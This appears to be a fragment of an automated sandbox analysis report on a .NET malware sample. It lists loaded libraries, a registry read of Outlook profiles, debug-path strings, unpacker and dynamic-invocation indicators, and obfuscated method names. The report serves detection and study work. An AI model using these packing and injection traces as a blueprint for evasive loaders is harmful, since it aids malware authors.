                      Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                      Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: find.pdb source: file.exe, 00000003.00000002.1567304245.0000000000C58000.00000004.00000020.00020000.00000000.sdmp, YpbicUfTwt.exe, 00000004.00000002.3861151206.0000000001188000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: YpbicUfTwt.exe, 00000004.00000002.3854637326.000000000029E000.00000002.00000001.01000000.0000000C.sdmp, YpbicUfTwt.exe, 00000007.00000000.1639437568.000000000029E000.00000002.00000001.01000000.0000000C.sdmp
                      Source: Binary string: wntdll.pdbUGP source: file.exe, 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, find.exe, 00000005.00000003.1566753130.0000000000B04000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000005.00000003.1573647222.0000000000CB3000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000005.00000002.3864892962.000000000307E000.00000040.00001000.00020000.00000000.sdmp, find.exe, 00000005.00000002.3864892962.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: file.exe, file.exe, 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, find.exe, find.exe, 00000005.00000003.1566753130.0000000000B04000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000005.00000003.1573647222.0000000000CB3000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000005.00000002.3864892962.000000000307E000.00000040.00001000.00020000.00000000.sdmp, find.exe, 00000005.00000002.3864892962.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: find.pdbGCTL source: file.exe, 00000003.00000002.1567304245.0000000000C58000.00000004.00000020.00020000.00000000.sdmp, YpbicUfTwt.exe, 00000004.00000002.3861151206.0000000001188000.00000004.00000020.00020000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      .NET source code contains method to dynamically call methods (often used by packers)
                      Source: 0.2.file.exe.7200000.4.raw.unpack, id.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      .NET source code contains potential unpacker
                      Source: 0.2.file.exe.3f1eb10.3.raw.unpack, vcGrCi4KDgYFK31I25.cs.Net Code: y01DCYMc7p System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.file.exe.7510000.5.raw.unpack, vcGrCi4KDgYFK31I25.cs.Net Code: y01DCYMc7p System.Reflection.Assembly.Load(byte[])
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00416043 push ecx; iretd 3_2_00416091
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00403260 push eax; ret 3_2_00403262
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00417A0F push edi; iretd 3_2_00417A1C
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00417A13 push edi; iretd 3_2_00417A1C
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00413C75 push esp; iretd 3_2_00413D3E
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00414C2E push cs; iretd 3_2_00414C2F
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00413C83 push esp; iretd 3_2_00413D3E
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_004185A1 push eax; retf 3_2_004185A2
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00417EF3 push edi; ret 3_2_00417EFF
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F409AD push ecx; mov dword ptr [esp], ecx3_2_00F409B6
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F11344 push eax; iretd 3_2_00F11369
                      Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exeCode function: 4_2_02F502B3 push cs; iretd 4_2_02F502B4
                      Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exeCode function: 4_2_02F53094 push edi; iretd 4_2_02F530A1
                      Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exeCode function: 4_2_02F53098 push edi; iretd 4_2_02F530A1
                      Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exeCode function: 4_2_02F50FFE push 7F79A0F1h; ret 4_2_02F5100D
                      Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exeCode function: 4_2_02F53C26 push eax; retf 4_2_02F53C27
                      Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exeCode function: 4_2_02F53578 push edi; ret 4_2_02F53584
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02EE225F pushad ; ret 5_2_02EE27F9
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02EE27FA pushad ; ret 5_2_02EE27F9
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02EE283D push eax; iretd 5_2_02EE2858
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02F109AD push ecx; mov dword ptr [esp], ecx5_2_02F109B6
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02EE1368 push eax; iretd 5_2_02EE1369
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_006DC4FF push edi; ret 5_2_006DC52D
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_006D2716 push 7F79A0F1h; ret 5_2_006D2725
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_006D47AC push edi; iretd 5_2_006D47B9
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_006D47B0 push edi; iretd 5_2_006D47B9
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_006D0A20 push esp; iretd 5_2_006D0ADB
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_006D0A12 push esp; iretd 5_2_006D0ADB
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_006D4C90 push edi; ret 5_2_006D4C9C
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_006D2DE0 push ecx; iretd 5_2_006D2E2E
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_006D533E push eax; retf 5_2_006D533F
                      Source: file.exeStatic PE information: section name: .text entropy: 7.764392398976114
                      Source: 0.2.file.exe.3f1eb10.3.raw.unpack, eINg4dDTquMH7LHiXG.csHigh entropy of concatenated method names: 'IkpAtV3ENq', 'BnOA4tfltc', 'UrjAoAjsrM', 'AFRAgEQ4oI', 'kSFAONmlrW', 'TghAFqgVE1', 'CDSWMnkD6MFTm0g7nv', 'gsW7sopAYdQYvmYeLk', 'oocAAllTXa', 'LLOAqfjmjm'
                      Source: 0.2.file.exe.3f1eb10.3.raw.unpack, IqQJjOU3Dce860oeqQ.csHigh entropy of concatenated method names: 'ChfCKvpbt', 'dpV0qLUSp', 'ItLWGMKLC', 'COtfkENPm', 'hqEJvfhII', 'fWI1bxqit', 'bwSlcWG1DyFQT4bObe', 'T6OuXCcCLYxlMJ4y2L', 'BJZMvDqOeUSjPuSEGn', 'aSAXrB08G'
                      Source: 0.2.file.exe.3f1eb10.3.raw.unpack, f24LqMJrjAjsrM0FRE.csHigh entropy of concatenated method names: 'RGMG0UlXZ6', 'X7sGWG9UsG', 'qwEGm2dnC6', 'QedGJFLQcA', 's9qGOdEoej', 'C7NGF7QMgJ', 'AcXGu0l8L1', 'WxpGXuEk3v', 'aXYGl6CdVJ', 'C72Gy8Hbud'
                      Source: 0.2.file.exe.3f1eb10.3.raw.unpack, ofaYTDjimBkQ1tJyJa.csHigh entropy of concatenated method names: 'qWruY5Sj06', 'ufcu8dss1U', 'pOXXHZuBR1', 'LCpXAYQhA4', 'P2eus00SGO', 'CavuR0lmib', 'lkAuPuPG8k', 'enQucPVnMO', 'G8muvfq8Fu', 'bGDuhq1BIT'
                      Source: 0.2.file.exe.3f1eb10.3.raw.unpack, srWQghpqgVE1cjis3v.csHigh entropy of concatenated method names: 'IfVbihna6j', 'XPubI4tBQp', 'jZHbTT5f8L', 'PSibtGXXyM', 'lFbb42VjVF', 'gotTMLOUnl', 'cAfTj5yeTJ', 'je2TE8FVgC', 'B2ZTYEA1gX', 'BmfT5hkm3v'
                      Source: 0.2.file.exe.3f1eb10.3.raw.unpack, yNFEmX52GUkxqP0cWI.csHigh entropy of concatenated method names: 'QoBlp3a3yX', 'LndlnqmKRm', 'FEql7fWeLB', 'K1slVSmxKB', 'U2YlLtFeUG', 'MHplxNgkdb', 'k6elrsQoYB', 'gsClSmvHQh', 'zQAlKE0nHa', 'UGWleX6kTE'
                      Source: 0.2.file.exe.3f1eb10.3.raw.unpack, xYVE7hI2PXwfFj7a0A.csHigh entropy of concatenated method names: 'Dispose', 'LiZA5Y42Cm', 'Vb2UnAedte', 'L16rMk92ma', 'uLiA8MX6P2', 'JT0Azk2wYG', 'ProcessDialogKey', 'H4NUHNFEmX', 'vGUUAkxqP0', 'RWIUUsaMru'
                      Source: 0.2.file.exe.3f1eb10.3.raw.unpack, GV3ENqm9nOtfltcevd.csHigh entropy of concatenated method names: 'U7XIciPvwm', 'hvfIvoeKF2', 'q8RIhOQSmj', 'bVEIQ8DuFH', 'DQGIMRLk9t', 'vGAIjqnngh', 'vOhIEJ6m5R', 'frSIY4DA7w', 'gm7I5QLdjw', 'navI8bsTqY'
                      Source: 0.2.file.exe.3f1eb10.3.raw.unpack, a84WmJERGriZY42Cmw.csHigh entropy of concatenated method names: 'v9BlOMvASq', 'ChTluNHuWO', 'nKhllIhBKA', 'db6ladVW45', 'h7nl2QCZrk', 'efvlBsGuhj', 'Dispose', 'cqkX6CFtKD', 'DuoXI5S1qR', 'GjWXGPVFd5'
                      Source: 0.2.file.exe.3f1eb10.3.raw.unpack, T4oIFJ1xNMwq14SFNm.csHigh entropy of concatenated method names: 'EH8T9IwO9B', 'P3iTfEp6DE', 'dvJG7uLeQU', 'ekmGVKpChC', 'fYlGLJ0XNV', 'ILoGxKDK6Y', 'HVCGrZ7Zvb', 'DV0GSYiwmb', 'iNPGKy5iUy', 'Xm5Gep3cTH'
                      Source: 0.2.file.exe.3f1eb10.3.raw.unpack, Da8u6PAAXu9xTDJKMvl.csHigh entropy of concatenated method names: 'ac1y87GF1M', 'yeXyzUj6Rk', 'TCYaHJlwXQ', 'HsOaAG9afu', 'R2xaUMdZqX', 'kpWaqdXTyO', 'jVDaD3Gdri', 'u9baiXHO6u', 'vCya6vZqQZ', 'JwbaI8RFUP'
                      Source: 0.2.file.exe.3f1eb10.3.raw.unpack, P7V2jfKk5ItC1mSWNt.csHigh entropy of concatenated method names: 'AWXtd5tYdY', 'FH6tNAv8Mf', 'KgctCT1DTw', 'hl4t0x4FVV', 'p5Qt9Ikkh3', 'J8EtWwIMPA', 'VEctfAD9ZH', 'D16tmfYrik', 'ItXtJVwRc5', 'mSkt1igigS'
                      Source: 0.2.file.exe.3f1eb10.3.raw.unpack, eYM3OSADOgcpGu4Lcuh.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'xZ6wlfkJM8', 'VBfwyDjM8o', 'kRPwab4X0I', 'IX9ww6h45X', 'Gi0w2x0h0V', 's5mwZOIWdf', 'jd9wBZSoNV'
                      Source: 0.2.file.exe.3f1eb10.3.raw.unpack, w2o2KVP5dAxWanL25L.csHigh entropy of concatenated method names: 'uXk3mby4kR', 'xwG3JC3XH3', 'nfK3pxhF0q', 'lrh3n3ZtQG', 'Crx3VUBgg7', 'mLO3Lb803v', 'M8U3rpUZ47', 'kOT3SgNMUE', 'trr3e6PrKU', 'KRs3sX1mTw'
                      Source: 0.2.file.exe.3f1eb10.3.raw.unpack, HAdcPkcDXOuy9yjflL.csHigh entropy of concatenated method names: 'OiKOeMEBCn', 'cEiORl9WdW', 'oPsOcCvQhd', 'iktOvb0gF9', 'QdsOnO2uJQ', 'wLuO7oumD4', 'WfDOVhpKEI', 'aJaOLr25tg', 'w9EOxYjwVs', 'XRAOrntPa6'
                      Source: 0.2.file.exe.3f1eb10.3.raw.unpack, Re1S5OzPjZnhEAiBK6.csHigh entropy of concatenated method names: 'AWCyWufYty', 'tBMymCqUBK', 'vHMyJ5oTad', 'fZOypyIdtX', 'ES3ynZ67L8', 'WFsyV9Tbwj', 'fjYyL80OsG', 'TiZyBc8AF3', 'aMGydXDcAk', 'JS8yN3ZleY'
                      Source: 0.2.file.exe.3f1eb10.3.raw.unpack, OaMru18VfkBQmTAwDx.csHigh entropy of concatenated method names: 'rdcyGwk1Wk', 'UFFyT8p1i5', 'qE6ybtcDol', 'zdYytCfOIN', 'ItkylFKkDt', 'Lajy4ni3KC', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 0.2.file.exe.3f1eb10.3.raw.unpack, QidqLQAHuB61dbGJR1C.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'ti8ysvk6qb', 'ppMyRwd2Z4', 'zppyPpra27', 'cGuycXjDZB', 'Yblyv2wiCi', 'P77yhKsb5Q', 'AbmyQepY2J'
                      Source: 0.2.file.exe.3f1eb10.3.raw.unpack, vcGrCi4KDgYFK31I25.csHigh entropy of concatenated method names: 'GAQqisxhIB', 'Atwq6s0gmm', 'eCaqIp77jO', 'YT0qG8cMLt', 'lEPqTppuSe', 'tOFqbu67ao', 'v6sqtYAljI', 'PySq4SedLY', 'C5cqkMQfiE', 'N2pqopAoXu'
                      Source: 0.2.file.exe.3f1eb10.3.raw.unpack, J6KlYCQuneAOxHcpDE.csHigh entropy of concatenated method names: 'wBNuo1MjB9', 'VGnugiDnYM', 'ToString', 'F3cu6xydPl', 'atquIMywaH', 'kqouG9EJdL', 'bYXuTvIqyn', 'Ch0ubPpN3X', 'v7WutbCd9h', 'FeAu4bYknh'
                      Source: 0.2.file.exe.3f1eb10.3.raw.unpack, J7i1jUrwDExDXx5G5E.csHigh entropy of concatenated method names: 'tgCt61XCdp', 'AV7tGC1gZ3', 'oZ7tbHFUVJ', 'hltb8B0lKG', 'wpwbzb4HLi', 'BpstHFMnyc', 'A4UtAExLKW', 'kOBtU8e4Qj', 'PRytqVkdRi', 'wVxtDBsexN'
                      Source: 0.2.file.exe.3f1eb10.3.raw.unpack, ucaqXhhFDTQh8vlJxT.csHigh entropy of concatenated method names: 'ToString', 'OZjFsALQK2', 'XoEFnmPUIq', 'LnCF7evQHY', 'kGiFVe5kwP', 'hRcFLraRXv', 'P1nFx7uWUZ', 'c6aFrQdFBK', 'Vl5FSexORa', 'vjoFKQ6KLZ'
                      Source: 0.2.file.exe.3f1eb10.3.raw.unpack, liXxucGPXAD00a5u5a.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'bbDU5DZ7xp', 'IeYU8omIa9', 'RvwUzFY286', 'A75qHOT9Wj', 'BaKqA2Mpug', 'EwqqUdYr2u', 'UPCqqUs63V', 'Uuu40XgHA0OGvIUv55M'
                      Source: 0.2.file.exe.3f1eb10.3.raw.unpack, bGj3S0AqMqQWUNssvxa.csHigh entropy of concatenated method names: 'psqa8vIyBu', 'lA5azr6GRX', 'AZlwHiaH9N', 'tro9LOCFfxEBbKYSPKr', 'KaVMRaCTTUXiP3xQsNF', 'YwUJNCCv2WdoR52JHK6', 'TgnmbhCJiHjnT4BlGM0'
                      Source: 0.2.file.exe.7510000.5.raw.unpack, eINg4dDTquMH7LHiXG.csHigh entropy of concatenated method names: 'IkpAtV3ENq', 'BnOA4tfltc', 'UrjAoAjsrM', 'AFRAgEQ4oI', 'kSFAONmlrW', 'TghAFqgVE1', 'CDSWMnkD6MFTm0g7nv', 'gsW7sopAYdQYvmYeLk', 'oocAAllTXa', 'LLOAqfjmjm'
                      Source: 0.2.file.exe.7510000.5.raw.unpack, IqQJjOU3Dce860oeqQ.csHigh entropy of concatenated method names: 'ChfCKvpbt', 'dpV0qLUSp', 'ItLWGMKLC', 'COtfkENPm', 'hqEJvfhII', 'fWI1bxqit', 'bwSlcWG1DyFQT4bObe', 'T6OuXCcCLYxlMJ4y2L', 'BJZMvDqOeUSjPuSEGn', 'aSAXrB08G'
                      Source: 0.2.file.exe.7510000.5.raw.unpack, f24LqMJrjAjsrM0FRE.csHigh entropy of concatenated method names: 'RGMG0UlXZ6', 'X7sGWG9UsG', 'qwEGm2dnC6', 'QedGJFLQcA', 's9qGOdEoej', 'C7NGF7QMgJ', 'AcXGu0l8L1', 'WxpGXuEk3v', 'aXYGl6CdVJ', 'C72Gy8Hbud'
                      Source: 0.2.file.exe.7510000.5.raw.unpack, ofaYTDjimBkQ1tJyJa.csHigh entropy of concatenated method names: 'qWruY5Sj06', 'ufcu8dss1U', 'pOXXHZuBR1', 'LCpXAYQhA4', 'P2eus00SGO', 'CavuR0lmib', 'lkAuPuPG8k', 'enQucPVnMO', 'G8muvfq8Fu', 'bGDuhq1BIT'
                      Source: 0.2.file.exe.7510000.5.raw.unpack, srWQghpqgVE1cjis3v.csHigh entropy of concatenated method names: 'IfVbihna6j', 'XPubI4tBQp', 'jZHbTT5f8L', 'PSibtGXXyM', 'lFbb42VjVF', 'gotTMLOUnl', 'cAfTj5yeTJ', 'je2TE8FVgC', 'B2ZTYEA1gX', 'BmfT5hkm3v'
                      Source: 0.2.file.exe.7510000.5.raw.unpack, yNFEmX52GUkxqP0cWI.csHigh entropy of concatenated method names: 'QoBlp3a3yX', 'LndlnqmKRm', 'FEql7fWeLB', 'K1slVSmxKB', 'U2YlLtFeUG', 'MHplxNgkdb', 'k6elrsQoYB', 'gsClSmvHQh', 'zQAlKE0nHa', 'UGWleX6kTE'
                      Source: 0.2.file.exe.7510000.5.raw.unpack, xYVE7hI2PXwfFj7a0A.csHigh entropy of concatenated method names: 'Dispose', 'LiZA5Y42Cm', 'Vb2UnAedte', 'L16rMk92ma', 'uLiA8MX6P2', 'JT0Azk2wYG', 'ProcessDialogKey', 'H4NUHNFEmX', 'vGUUAkxqP0', 'RWIUUsaMru'
                      Source: 0.2.file.exe.7510000.5.raw.unpack, GV3ENqm9nOtfltcevd.csHigh entropy of concatenated method names: 'U7XIciPvwm', 'hvfIvoeKF2', 'q8RIhOQSmj', 'bVEIQ8DuFH', 'DQGIMRLk9t', 'vGAIjqnngh', 'vOhIEJ6m5R', 'frSIY4DA7w', 'gm7I5QLdjw', 'navI8bsTqY'
                      Source: 0.2.file.exe.7510000.5.raw.unpack, a84WmJERGriZY42Cmw.csHigh entropy of concatenated method names: 'v9BlOMvASq', 'ChTluNHuWO', 'nKhllIhBKA', 'db6ladVW45', 'h7nl2QCZrk', 'efvlBsGuhj', 'Dispose', 'cqkX6CFtKD', 'DuoXI5S1qR', 'GjWXGPVFd5'
                      Source: 0.2.file.exe.7510000.5.raw.unpack, T4oIFJ1xNMwq14SFNm.csHigh entropy of concatenated method names: 'EH8T9IwO9B', 'P3iTfEp6DE', 'dvJG7uLeQU', 'ekmGVKpChC', 'fYlGLJ0XNV', 'ILoGxKDK6Y', 'HVCGrZ7Zvb', 'DV0GSYiwmb', 'iNPGKy5iUy', 'Xm5Gep3cTH'
                      Source: 0.2.file.exe.7510000.5.raw.unpack, Da8u6PAAXu9xTDJKMvl.csHigh entropy of concatenated method names: 'ac1y87GF1M', 'yeXyzUj6Rk', 'TCYaHJlwXQ', 'HsOaAG9afu', 'R2xaUMdZqX', 'kpWaqdXTyO', 'jVDaD3Gdri', 'u9baiXHO6u', 'vCya6vZqQZ', 'JwbaI8RFUP'
                      Source: 0.2.file.exe.7510000.5.raw.unpack, P7V2jfKk5ItC1mSWNt.csHigh entropy of concatenated method names: 'AWXtd5tYdY', 'FH6tNAv8Mf', 'KgctCT1DTw', 'hl4t0x4FVV', 'p5Qt9Ikkh3', 'J8EtWwIMPA', 'VEctfAD9ZH', 'D16tmfYrik', 'ItXtJVwRc5', 'mSkt1igigS'
                      Source: 0.2.file.exe.7510000.5.raw.unpack, eYM3OSADOgcpGu4Lcuh.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'xZ6wlfkJM8', 'VBfwyDjM8o', 'kRPwab4X0I', 'IX9ww6h45X', 'Gi0w2x0h0V', 's5mwZOIWdf', 'jd9wBZSoNV'
                      Source: 0.2.file.exe.7510000.5.raw.unpack, w2o2KVP5dAxWanL25L.csHigh entropy of concatenated method names: 'uXk3mby4kR', 'xwG3JC3XH3', 'nfK3pxhF0q', 'lrh3n3ZtQG', 'Crx3VUBgg7', 'mLO3Lb803v', 'M8U3rpUZ47', 'kOT3SgNMUE', 'trr3e6PrKU', 'KRs3sX1mTw'
                      Source: 0.2.file.exe.7510000.5.raw.unpack, HAdcPkcDXOuy9yjflL.csHigh entropy of concatenated method names: 'OiKOeMEBCn', 'cEiORl9WdW', 'oPsOcCvQhd', 'iktOvb0gF9', 'QdsOnO2uJQ', 'wLuO7oumD4', 'WfDOVhpKEI', 'aJaOLr25tg', 'w9EOxYjwVs', 'XRAOrntPa6'
                      Source: 0.2.file.exe.7510000.5.raw.unpack, Re1S5OzPjZnhEAiBK6.csHigh entropy of concatenated method names: 'AWCyWufYty', 'tBMymCqUBK', 'vHMyJ5oTad', 'fZOypyIdtX', 'ES3ynZ67L8', 'WFsyV9Tbwj', 'fjYyL80OsG', 'TiZyBc8AF3', 'aMGydXDcAk', 'JS8yN3ZleY'
                      Source: 0.2.file.exe.7510000.5.raw.unpack, OaMru18VfkBQmTAwDx.csHigh entropy of concatenated method names: 'rdcyGwk1Wk', 'UFFyT8p1i5', 'qE6ybtcDol', 'zdYytCfOIN', 'ItkylFKkDt', 'Lajy4ni3KC', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 0.2.file.exe.7510000.5.raw.unpack, QidqLQAHuB61dbGJR1C.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'ti8ysvk6qb', 'ppMyRwd2Z4', 'zppyPpra27', 'cGuycXjDZB', 'Yblyv2wiCi', 'P77yhKsb5Q', 'AbmyQepY2J'
                      Source: 0.2.file.exe.7510000.5.raw.unpack, vcGrCi4KDgYFK31I25.csHigh entropy of concatenated method names: 'GAQqisxhIB', 'Atwq6s0gmm', 'eCaqIp77jO', 'YT0qG8cMLt', 'lEPqTppuSe', 'tOFqbu67ao', 'v6sqtYAljI', 'PySq4SedLY', 'C5cqkMQfiE', 'N2pqopAoXu'
                      Source: 0.2.file.exe.7510000.5.raw.unpack, J6KlYCQuneAOxHcpDE.csHigh entropy of concatenated method names: 'wBNuo1MjB9', 'VGnugiDnYM', 'ToString', 'F3cu6xydPl', 'atquIMywaH', 'kqouG9EJdL', 'bYXuTvIqyn', 'Ch0ubPpN3X', 'v7WutbCd9h', 'FeAu4bYknh'
                      Source: 0.2.file.exe.7510000.5.raw.unpack, J7i1jUrwDExDXx5G5E.csHigh entropy of concatenated method names: 'tgCt61XCdp', 'AV7tGC1gZ3', 'oZ7tbHFUVJ', 'hltb8B0lKG', 'wpwbzb4HLi', 'BpstHFMnyc', 'A4UtAExLKW', 'kOBtU8e4Qj', 'PRytqVkdRi', 'wVxtDBsexN'
                      Source: 0.2.file.exe.7510000.5.raw.unpack, ucaqXhhFDTQh8vlJxT.csHigh entropy of concatenated method names: 'ToString', 'OZjFsALQK2', 'XoEFnmPUIq', 'LnCF7evQHY', 'kGiFVe5kwP', 'hRcFLraRXv', 'P1nFx7uWUZ', 'c6aFrQdFBK', 'Vl5FSexORa', 'vjoFKQ6KLZ'
                      Source: 0.2.file.exe.7510000.5.raw.unpack, liXxucGPXAD00a5u5a.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'bbDU5DZ7xp', 'IeYU8omIa9', 'RvwUzFY286', 'A75qHOT9Wj', 'BaKqA2Mpug', 'EwqqUdYr2u', 'UPCqqUs63V', 'Uuu40XgHA0OGvIUv55M'
                      Source: 0.2.file.exe.7510000.5.raw.unpack, bGj3S0AqMqQWUNssvxa.csHigh entropy of concatenated method names: 'psqa8vIyBu', 'lA5azr6GRX', 'AZlwHiaH9N', 'tro9LOCFfxEBbKYSPKr', 'KaVMRaCTTUXiP3xQsNF', 'YwUJNCCv2WdoR52JHK6', 'TgnmbhCJiHjnT4BlGM0'
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
